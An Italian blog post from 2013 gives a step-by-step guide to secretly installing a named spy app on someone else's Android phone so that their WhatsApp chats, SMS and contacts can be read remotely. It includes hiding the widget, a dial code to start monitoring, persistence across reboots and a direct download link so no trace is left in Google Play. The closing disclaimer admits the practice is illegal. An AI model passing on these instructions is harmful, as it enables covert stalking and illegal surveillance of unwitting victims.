Twenga

martedì 25 giugno 2013

[Guida] Come spiare le conversazioni Whatsapp su Android?

WhatsApp è facilmente vulnerabile agli attacchi di malintenzionati pronti a spiare le vostre conversazione. Oggi vi spiegheremo una delle tante (e semplici) tecniche che utilizzano per leggere le conversazioni su Whatsapp. Un modo per scrutare i segreti degli utenti, nascosti nelle conversazioni di Whatsapp è quello di utilizzare applicazioni Android che hanno lo specifico scopo di spiare.




 Stiamo parlando di SMS, WhatsApp & spy chiamate  che come avete potuto intuire dal titolo, riesce in modo silente a ricavare importanti dati del vostro Smartphone Android. 
Infatti attraverso questa app possiamo monitorare (da remoto) un telefono cellulare Android, leggere quindi gli SMS, e soprattutto leggere le conversazioni di WhatsApp, oltre che spiare l'elenco contatti. Ma come funziona concretamente? Semplice, baseterà installare all'insaputa dell'ignara vittima questa applicazione, e possiamo monitorare i movimenti (come per esempio spiare le conversazioni Whatsapp) in tempo reale sul sito Spy-To-Mobile.com

Più nello specifico bisognerà effettuare questi passaggi:
1.Scaricare e installare sullo Smartphone Android l'applicazione in questione.
2. Inseriamo il Widget "DATA_BACKUP"  sullo schermo dello Smartphone da monitorare. Il Widget sarà invisibile. Per i dispositivi Android è necessario comporre il numero "51" e premere il tasto chiamata per avviare il monitoraggio. L'applicazione spia sarà presente ogni volta che accendiamo lo Smartphone.
Chi non vuole lasciare traccia di questa applicazione, la installa direttamente da http://Spy-To-Mobile.com/d per non lasciare il segno su Google Play.

Ricordiamo che applicare queste note, è illegale e androitech non si assume nessuna responsabilità. Diamo fiducia al vostro senso di responsabilità.


Nessun commento:

Posta un commento

roll

){C